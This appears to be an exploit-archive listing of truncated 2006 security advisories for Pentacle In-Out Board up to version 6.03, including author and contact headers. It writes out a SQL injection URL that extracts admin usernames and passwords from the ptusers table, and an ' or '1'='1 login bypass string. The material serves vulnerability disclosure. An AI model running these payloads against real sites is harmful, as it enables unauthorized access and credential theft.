Advisory: Pentacle In-Out Board <= 6.03 (login.asp) Authencation ByPass Vulnerability

--Security Report-- Advisory: Pentacle In-Out Board = 6.03 login.asp Authencation ByPass Vulnerability --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 25/02/06 05:56 AM --- Contacts: ICQ: 10072 MSN/Email: nukedx at nukedx dot com Web: http://www.nukedx.com --- Vendor: G2SOFT...

Advisory: Pentacle In-Out Board <= 6.03 (newsdetailsview.asp newsid) Remote SQL Injection Vulnerability

--Security Report-- Advisory: Pentacle In-Out Board = 6.03 newsdetailsview.asp newsid Remote SQL Injection Vulnerability --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 25/02/06 06:08 AM --- Contacts: ICQ: 10072 MSN/Email: [email protected] Web: http://www.nukedx.com --- Vendo...

PentacleSQL.txt

--Security Report-- Advisory: Pentacle In-Out Board http://site/ptdir/newsdetailsview.asp?newsid=11%20SQLCode EXAMPLE - http://site/ptdir/newsdetailsview.asp?newsid=11%20union%20select%200,userpassword,0,username,0,0,0,0 %20from%20ptusers%20where%20userid=1%20and%20useradmin=yes With this example...

PentacleBypass.txt

--Security Report-- Advisory: Pentacle In-Out Board http://site/ptdir/login.asp?username=any&password=' or '1'='1 -- Timeline: 25/02/2006: Vulnerability found. 25/02/2006: Contacted with vendor and waiting reply. -- Exploit: http://www.nukedx.com/?getxpl=13 -- Original advisory:...